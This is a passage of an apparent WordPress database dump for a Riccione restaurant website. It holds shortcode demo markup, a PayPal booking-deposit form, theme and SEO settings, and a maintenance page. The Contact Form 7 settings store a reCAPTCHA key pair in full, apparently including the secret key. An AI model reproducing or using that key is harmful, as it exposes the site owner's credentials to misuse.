su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n</div>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"8\">&lt;h2&gt;Fancy accordion&lt;/h2&gt;\n\n[su_accordion]\n  [su_spoiler title=&quot;Spoiler title&quot; style=&quot;fancy&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot; style=&quot;fancy&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot; style=&quot;fancy&quot;] Spoiler content [/su_spoiler]\n[/su_accordion]</textarea></div><h2>Accordion with open spoiler</h2>\n<div class=\"su-accordion\">\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n</div>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"8\">&lt;h2&gt;Accordion with open spoiler&lt;/h2&gt;\n\n[su_accordion]\n  [su_spoiler title=&quot;Spoiler title&quot; open=&quot;yes&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot;] Spoiler content [/su_spoiler]\n[/su_accordion]</textarea></div><h2>Different spoiler styles</h2>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-fancy su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-simple su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"6\">&lt;h2&gt;Different spoiler styles&lt;/h2&gt;\n\n[su_spoiler title=&quot;Spoiler title&quot; style=&quot;default&quot;] Spoiler content [/su_spoiler]\n[su_spoiler title=&quot;Spoiler title&quot; style=&quot;fancy&quot;] Spoiler content [/su_spoiler]\n[su_spoiler title=&quot;Spoiler title&quot; style=&quot;simple&quot;] Spoiler content [/su_spoiler]</textarea></div><h2>Open spoilers</h2>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-fancy su-spoiler-icon-plus\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-simple su-spoiler-icon-plus\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"6\">&lt;h2&gt;Open spoilers&lt;/h2&gt;\n\n[su_spoiler title=&quot;Spoiler title&quot; style=&quot;default&quot; open=&quot;yes&quot;] Spoiler content [/su_spoiler]\n[su_spoiler title=&quot;Spoiler title&quot; style=&quot;fancy&quot; open=&quot;yes&quot;] Spoiler content [/su_spoiler]\n[su_spoiler title=&quot;Spoiler title&quot; style=&quot;simple&quot; open=&quot;yes&quot;] Spoiler content [/su_spoiler]</textarea></div><h2>Spoilers with anchors (see the code)</h2>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\" data-anchor=\"Spoiler-1\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\" data-anchor=\"Spoiler-2\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\" data-anchor=\"Spoiler-3\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<p>Use next links to open this spoilers</p>\n<p><a href=\"#Spoiler-1\">Open spoiler 1</a> | <a href=\"#Spoiler-2\">Open spoiler 2</a> | <a href=\"#Spoiler-3\">Open spoiler 3</a></p>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"10\">&lt;h2&gt;Spoilers with anchors (see the code)&lt;/h2&gt;\n\n[su_spoiler title=&quot;Spoiler title&quot; anchor=&quot;Spoiler-1&quot;] Spoiler content [/su_spoiler]\n[su_spoiler title=&quot;Spoiler title&quot; anchor=&quot;Spoiler-2&quot;] Spoiler content [/su_spoiler]\n[su_spoiler title=&quot;Spoiler title&quot; anchor=&quot;Spoiler-3&quot;] Spoiler content [/su_spoiler]\n\nUse next links to open this spoilers\n\n&lt;a href=&quot;#Spoiler-1&quot;&gt;Open spoiler 1&lt;/a&gt; | &lt;a href=&quot;#Spoiler-2&quot;&gt;Open spoiler 2&lt;/a&gt; | &lt;a href=&quot;#Spoiler-3&quot;&gt;Open spoiler 3&lt;/a&gt;</textarea></div><h2>Accordion + Spoilers + Anchors (see the code)</h2>\n<div class=\"su-accordion\">\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\" data-anchor=\"Accordion-1\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\" data-anchor=\"Accordion-2\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\" data-anchor=\"Accordion-3\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n</div>\n<p>Use next links to expand accordion items</p>\n<p><a href=\"#Accordion-1\">Open spoiler 1</a> | <a href=\"#Accordion-2\">Open spoiler 2</a> | <a href=\"#Accordion-3\">Open spoiler 3</a></p>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"12\">&lt;h2&gt;Accordion + Spoilers + Anchors (see the code)&lt;/h2&gt;\n\n[su_accordion]\n  [su_spoiler title=&quot;Spoiler title&quot; anchor=&quot;Accordion-1&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot; anchor=&quot;Accordion-2&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot; anchor=&quot;Accordion-3&quot;] Spoiler content [/su_spoiler]\n[/su_accordion]\n\nUse next links to expand accordion items\n\n&lt;a href=&quot;#Accordion-1&quot;&gt;Open spoiler 1&lt;/a&gt; | &lt;a href=&quot;#Accordion-2&quot;&gt;Open spoiler 2&lt;/a&gt; | &lt;a href=&quot;#Accordion-3&quot;&gt;Open spoiler 3&lt;/a&gt;</textarea></div><h2>Different icons</h2>\n<div class=\"su-accordion\">\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>plus</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus-circle su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>plus-circle</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus-square-1 su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>plus-square-1</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus-square-2 su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>plus-square-2</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-arrow su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>arrow</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-arrow-circle-1 su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>arrow-circle-1</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-arrow-circle-2 su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>arrow-circle-2</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-caret su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>caret</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-caret-square su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>caret-square</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-folder-1 su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>folder-1</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-folder-2 su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>folder-2</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n</div>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"16\">&lt;h2&gt;Different icons&lt;/h2&gt;\n\n[su_accordion]\n  [su_spoiler title=&quot;plus&quot; icon=&quot;plus&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;plus-circle&quot; icon=&quot;plus-circle&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;plus-square-1&quot; icon=&quot;plus-square-1&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;plus-square-2&quot; icon=&quot;plus-square-2&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;arrow&quot; icon=&quot;arrow&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;arrow-circle-1&quot; icon=&quot;arrow-circle-1&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;arrow-circle-2&quot; icon=&quot;arrow-circle-2&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;caret&quot; icon=&quot;caret&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;caret-square&quot; icon=&quot;caret-square&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;folder-1&quot; icon=&quot;folder-1&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;folder-2&quot; icon=&quot;folder-2&quot;] Spoiler content [/su_spoiler]\n[/su_accordion]</textarea></div><h2>Custom styles</h2>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus my-custom-spoiler su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<p><!--\n  IMPORTANT\n  You need to add this CSS code to the custom CSS editor at plugin settings page\n--></p>\n<style>\n  .su-spoiler.my-custom-spoiler {}\n  .su-spoiler.my-custom-spoiler .su-spoiler-title { background-color: #84ADEA }\n  .su-spoiler.my-custom-spoiler .su-spoiler-title .su-spoiler-icon,\n  .su-spoiler.su-spoiler-closed.my-custom-spoiler .su-spoiler-title .su-spoiler-icon {\n    left: 3px;\n    background-color: #fff;\n  }\n  .su-spoiler.my-custom-spoiler .su-spoiler-content { background-color: #C0D1EB }\n</style>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"19\">&lt;h2&gt;Custom styles&lt;/h2&gt;\n\n[su_spoiler title=&quot;Spoiler title&quot; class=&quot;my-custom-spoiler&quot;] Spoiler content [/su_spoiler]\n\n&lt;!--\n  IMPORTANT\n  You need to add this CSS code to the custom CSS editor at plugin settings page\n--&gt;\n&lt;style&gt;\n  .su-spoiler.my-custom-spoiler {}\n  .su-spoiler.my-custom-spoiler .su-spoiler-title { background-color: #84ADEA }\n  .su-spoiler.my-custom-spoiler .su-spoiler-title .su-spoiler-icon,\n  .su-spoiler.su-spoiler-closed.my-custom-spoiler .su-spoiler-title .su-spoiler-icon {\n    left: 3px;\n    background-color: #fff;\n  }\n  .su-spoiler.my-custom-spoiler .su-spoiler-content { background-color: #C0D1EB }\n&lt;/style&gt;</textarea></div><link rel=\'stylesheet\' id=\'font-awesome-css\'  href=\'http://www.ristorantesolymar.it/wp-content/plugins/types/embedded/toolset/toolset-common/utility/css/font-awesome/css/font-awesome.min.css?ver=4.4.0\' type=\'text/css\' media=\'all\' />\n<link rel=\'stylesheet\' id=\'su-box-shortcodes-css\'  href=\'http://www.ristorantesolymar.it/wp-content/plugins/shortcodes-ultimate/assets/css/box-shortcodes.css?ver=4.9.9\' type=\'text/css\' media=\'all\' />\n<script type=\'text/javascript\' src=\'http://www.ristorantesolymar.it/wp-includes/js/jquery/jquery.js?ver=1.11.3\'></script>\n<script type=\'text/javascript\' src=\'http://www.ristorantesolymar.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1\'></script>\n<script type=\'text/javascript\'>\n/* <![CDATA[ */\nvar su_other_shortcodes = {\"no_preview\":\"This shortcode doesn\'t work in live preview. Please insert it into editor and preview on the site.\"};\n/* ]]> */\n</script>\n<script type=\'text/javascript\' src=\'http://www.ristorantesolymar.it/wp-content/plugins/shortcodes-ultimate/assets/js/other-shortcodes.js?ver=4.9.9\'></script>\n','yes'),(5327,'shortcoder_flags','a:1:{s:7:\"version\";s:5:\"3.4.1\";}','yes'),(5328,'shortcoder_data','a:1:{s:13:\"Paypal pasqua\";a:3:{s:7:\"content\";s:1638:\"<strong>Invia pagamento caparra</strong>\r\n(verificare sempre la disponibilità telefonicamente e anticipatamente, grazie)\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"EFNUMLX5AVE8W\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Numero Coperti\">Numero Coperti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 persona\">1 persona €15,00 EUR</option>\r\n	<option value=\"2 persone\">2 persone €30,00 EUR</option>\r\n	<option value=\"3 persone\">3 persone €45,00 EUR</option>\r\n	<option value=\"4 persone\">4 persone €60,00 EUR</option>\r\n	<option value=\"5 persone\">5 persone €75,00 EUR</option>\r\n	<option value=\"6 persone\">6 persone €90,00 EUR</option>\r\n	<option value=\"7 persone\">7 persone €105,00 EUR</option>\r\n	<option value=\"8 persone\">8 persone €120,00 EUR</option>\r\n	<option value=\"9 persone\">9 persone €135,00 EUR</option>\r\n	<option value=\"10 persone\">10 persone €150,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Nome/Tel di chi prenota (obbl)\">Nome/Tel di chi prenota (obbl)</td></tr><tr><td><input type=\"text\" name=\"os1\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_paynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n\";s:8:\"disabled\";i:0;s:10:\"hide_admin\";i:0;}}','yes'),(5357,'default_iubenda_output_feed','1','yes'),(5359,'iubenda_output_filter','1','yes'),(6473,'sib_senders_option','a:0:{}','yes'),(6481,'theme_mods_Impressive-child','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1461159936;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:6:\"text-3\";i:1;s:20:\"sib_subscribe_form-2\";i:2;s:6:\"text-2\";}}}}','yes'),(6483,'theme_mods_sydney','a:27:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:17:\"front_header_type\";s:6:\"slider\";s:16:\"site_header_type\";s:5:\"image\";s:14:\"slider_image_1\";s:79:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/serata-1920x1275.jpg\";s:14:\"slider_title_1\";s:0:\"\";s:17:\"slider_subtitle_1\";s:0:\"\";s:14:\"slider_image_2\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1922-1920x1275.jpg\";s:14:\"slider_title_2\";s:0:\"\";s:17:\"slider_subtitle_2\";s:0:\"\";s:14:\"slider_image_3\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1608-1920x1275.jpg\";s:12:\"slider_speed\";i:8000;s:16:\"textslider_slide\";i:1;s:12:\"header_image\";s:80:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:197;s:3:\"url\";s:80:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg\";s:13:\"thumbnail_url\";s:80:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg\";s:6:\"height\";i:600;s:5:\"width\";i:1920;}s:10:\"menu_style\";s:8:\"centered\";s:16:\"site_title_color\";s:7:\"#d65050\";s:19:\"submenu_items_color\";s:7:\"#ffffff\";s:9:\"site_logo\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png\";s:13:\"primary_color\";s:7:\"#ff9999\";s:15:\"top_items_color\";s:7:\"#ffffff\";s:13:\"sidebar_color\";s:7:\"#767676\";s:12:\"rows_overlay\";s:7:\"#666666\";s:19:\"footer_widget_areas\";s:1:\"3\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1611163232;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:9:{i:0;s:13:\"media_image-3\";i:1;s:6:\"text-5\";i:2;s:6:\"text-6\";i:3;s:28:\"woocommerce_product_search-2\";i:4;s:32:\"woocommerce_product_categories-2\";i:5;s:26:\"woocommerce_price_filter-2\";i:6;s:22:\"woocommerce_products-2\";i:7;s:6:\"text-3\";i:8;s:13:\"media_image-4\";}s:9:\"sidebar-1\";a:1:{i:0;s:13:\"custom_html-2\";}s:8:\"footer-1\";a:1:{i:0;s:6:\"text-2\";}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}}}s:18:\"custom_css_post_id\";i:-1;s:19:\"forked_owl_carousel\";b:1;}','yes'),(6496,'sp_siteoffline_options','a:2:{s:7:\"content\";s:3801:\"                                                                &lt;!DOCTYPE html&gt;\r\n&lt;html&gt;\r\n    &lt;head&gt;\r\n        &lt;title&gt;Ristorante Sol y mar - Riccione - Temporaneamente offline&lt;/title&gt;\r\n        &lt;style type=&quot;text/css&quot;&gt;\r\n            body\r\n            {\r\n                font-size:16px;\r\n                font-family: \'Kameron\', Georgia,serif;\r\n            }\r\n            #cont\r\n            {\r\n                position:relative;\r\n                width:100%;\r\n                margin-top:20%;\r\n            }\r\n            .align-center{\r\n                text-align:center;\r\n            }\r\n            .center-msg-box{\r\n                max-width: 600px;\r\n                margin-left: auto !important;\r\n                margin-right: auto !important;\r\n            }\r\n            .blue-box{\r\n                margin: 10px 0 15px;\r\n                background-color: #F0F9FF;\r\n                border-color: #1166BB;\r\n                color: #1166BB;\r\n                border-radius: 3px 3px 3px 3px;\r\n                border-style: solid;\r\n                border-width: 1px;   \r\n                padding: 0 0 0 1em;\r\n                line-height: 20px;\r\n            }\r\n\r\n            div#list .green,div#list .red\r\n            {\r\n                width:400px;\r\n            }\r\n        &lt;/style&gt;\r\n\r\n        &lt;script type=&quot;text/javascript&quot;&gt;\r\n            WebFontConfig = {\r\n                google: {families: [\'Kameron:400,700\']}\r\n            };\r\n            (function() {\r\n                var wf = document.createElement(\'script\');\r\n                wf.src = (\'https:\' == document.location.protocol ? \'https\' : \'http\') +\r\n                        \'://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js\';\r\n                wf.type = \'text/javascript\';\r\n                wf.async = \'true\';\r\n                var s = document.getElementsByTagName(\'script\')[0];\r\n                s.parentNode.insertBefore(wf, s);\r\n            })();\r\n        &lt;/script&gt;\r\n    &lt;/head&gt;\r\n    &lt;body&gt;\r\n        &lt;div id=&quot;cont&quot;&gt;\r\n            &lt;div class=&quot;content&quot;&gt;\r\n                &lt;h1 class=&quot;align-center&quot;&gt;Sito in manutenzione&lt;/h1&gt;\r\n                &lt;div class=&quot;blue-box center-msg-box&quot;&gt;\r\n                    &lt;p class=&quot;align-center&quot;&gt;Spiacenti per l\'inconveniente, lavori in corso&lt;/p&gt;\r\n                    &lt;p class=&quot;align-center&quot;&gt;Si prega di riprovare piu\' tardi. Nel frattempo puoi venirci a trovare nella nostra pagina Facebook:&lt;/p&gt;\r\n\r\n&lt;div id=&quot;fb-root&quot;&gt;&lt;/div&gt;\r\n&lt;script&gt;(function(d, s, id) {\r\n  var js, fjs = d.getElementsByTagName(s)[0];\r\n  if (d.getElementById(id)) return;\r\n  js = d.createElement(s); js.id = id;\r\n  js.src = &quot;//connect.facebook.net/it_IT/sdk.js#xfbml=1&amp;version=v2.4&amp;appId=228800167261670&quot;;\r\n  fjs.parentNode.insertBefore(js, fjs);\r\n}(document, \'script\', \'facebook-jssdk\'));&lt;/script&gt;&lt;div class=&quot;fb-page&quot; data-href=&quot;https://www.facebook.com/www.ristorantesolymar.it&quot; data-width=&quot;300&quot; data-small-header=&quot;false&quot; data-adapt-container-width=&quot;true&quot; data-hide-cover=&quot;false&quot; data-show-facepile=&quot;true&quot; data-show-posts=&quot;true&quot;&gt;&lt;div class=&quot;fb-xfbml-parse-ignore&quot;&gt;&lt;blockquote cite=&quot;https://www.facebook.com/www.ristorantesolymar.it&quot;&gt;&lt;a href=&quot;https://www.facebook.com/www.ristorantesolymar.it&quot;&gt;ristorante solymar riccione&lt;/a&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;\r\n\r\n                &lt;/div&gt;                \r\n            &lt;/div&gt;\r\n\r\n        &lt;/div&gt;\r\n    &lt;/body&gt;\r\n&lt;/html&gt;\r\n\r\n\r\n                                                                \";s:7:\"enabled\";b:0;}','yes'),(6498,'theme_mods_Sydney-child','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1461160363;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:21:\"sydney_contact_info-2\";}s:9:\"sidebar-1\";a:3:{i:0;s:6:\"text-3\";i:1;s:20:\"sib_subscribe_form-2\";i:2;s:6:\"text-2\";}s:8:\"footer-1\";N;s:8:\"footer-2\";N;s:8:\"footer-3\";N;}}}','yes'),(6546,'wpcf7','a:4:{s:7:\"version\";s:3:\"5.4\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";d:1544821794;s:7:\"version\";s:3:\"5.1\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}s:9:\"recaptcha\";a:1:{s:40:\"6LcxyYEUAAAAAKUcaONErSO0PB1WoX07tF_nXgV7\";s:40:\"6LcxyYEUAAAAANrbwtNQsMyUHX3mx6BpasumznuO\";}s:23:\"recaptcha_v2_v3_warning\";b:0;}','yes'),(6553,'wpseo','a:44:{s:8:\"tracking\";b:0;s:22:\"license_server_version\";s:1:\"2\";s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:16:\"indexing_started\";b:0;s:15:\"indexing_reason\";s:23:\"home_url_option_changed\";s:29:\"indexables_indexing_completed\";b:0;s:7:\"version\";s:6:\"16.1.1\";s:16:\"previous_version\";s:4:\"16.1\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:0;s:18:\"first_activated_on\";i:1476982609;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:36:\"/%year%/%monthnum%/%day%/%postname%/\";s:8:\"home_url\";s:40:\"https://www.ristorantesolymar.it/vecchio\";s:18:\"dynamic_permalinks\";b:0;s:17:\"category_base_url\";s:0:\"\";s:12:\"tag_base_url\";s:0:\"\";s:21:\"custom_taxonomy_slugs\";a:11:{s:24:\"masonry-gallery-category\";s:24:\"masonry-gallery-category\";s:18:\"portfolio-category\";s:18:\"portfolio-category\";s:13:\"portfolio-tag\";s:13:\"portfolio-tag\";s:21:\"testimonials-category\";s:21:\"testimonials-category\";s:24:\"restaurant-menu-category\";s:24:\"restaurant-menu-category\";s:12:\"product_type\";s:12:\"product_type\";s:18:\"product_visibility\";s:18:\"product_visibility\";s:11:\"product_cat\";s:18:\"categoria-pr